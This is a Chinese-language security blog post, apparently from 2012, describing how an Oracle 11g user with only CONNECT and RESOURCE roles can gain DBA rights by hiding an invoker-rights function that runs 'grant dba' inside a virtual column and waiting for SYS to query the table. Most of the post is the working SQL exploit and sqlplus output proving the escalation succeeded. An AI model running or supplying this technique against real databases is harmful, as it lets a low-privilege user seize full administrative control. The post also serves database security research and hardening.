Oracle 11g 利用virtual columns 获取DBA权限

作者:Birdarmy

微安全- 新浪微博安全组技术博客  首发，转载请注明出处

[感谢Linux520的Birdarmy同学友情投稿]

在Oracle 11g中系统提供了一个新功能 Virtual columns 。

官网描述：

A virtual column is not stored on disk. Rather, the database derives the values in a virtual column on demand by computing a set of expressions or functions. Virtual columns can be used in queries, DML, and DDL statements.

系统利用virtual columns，在需要使用此列数据的时候才调用运算或者函数，不在硬盘上保存结果，类似view功能。

virtual columns 语法

column_name [datatype] [GENERATED ALWAYS] AS (expression) [VIRTUAL]

例如：

SQL> create table test(a int,b int,c generated always as (a+b) virtual);

Table created.

SQL> insert into test (a ,b ) values (10,20);

1 row created.

SQL> select * from test;

A            B              C

———- ———- ———-

10         20         30

由于此功能可以使用函数，如果用户同时拥有创建函数的权限，那么就可以利用oracle提升权限中常用的授权函数。在虚拟列中使用授权函数，当sys进行查询的时候，就会触发事件，或者其余任何方式，只要触发这个函数即可，就可以成功将用户 提升到DBA权限

例：

首先我们创建一个用户birdarmy，让其拥有创建表和函数的权限，为了方便测试这里我直接赋予他们connect和resource权限。

SQL> create user birdarmy identified by 123456;

User created.

SQL> grant connect,resource to birdarmy;

Grant succeeded.

以birdarmy权限进行登录，创建利用函数和表。

[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:36:12 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

创建一个授权函数，使用grant dba to birdarmy进行提升权限。当sys等具有高级赋权功能的用户调用此函数的时候，就将birdarmy的权限提升为DBA。

SQL> CREATE OR REPLACE FUNCTION GRANT_DBA_TO_USER (v IN INT)

RETURN INT AUTHID CURRENT_USER  DETERMINISTIC

AS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE ‘grant dba to birdarmy‘;

RETURN 0;

END GRANT_DBA_TO_USER;

/

创建一个测试表 exploit_virtual_columns，在虚拟列上使用授权函数。

SQL> create table exploit_virtual_columns(a int,b generated always AS (GRANT_DBA_TO_USER (a)) virtual);

插入一条数据，这样用户查询exploit_virtual_columns表的时候才会触发虚拟列的函数。

SQL> insert  into exploit_virtual_columns (a) values (1);

查看当前用户的权限，仅为connect，resource。

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
—————————— —————————— — — —
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO

[oracle@ORA-TEST-03 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:42:43 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

用sys用户查询exploit_virtual_columns，触发虚拟列中GRANT_DBA_TO_USER函数。

SQL> select * from birdarmy.exploit_virtual_columns;

A              B

———- ———-

1              0

[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:43:14 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

查看用户权限，成功获取DBA权限

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
—————————— —————————— — — —
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       DBA                            NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO

阅读:614045 | 评论:0 | 标签:安全技术 dba oracle virtual columns 权限提升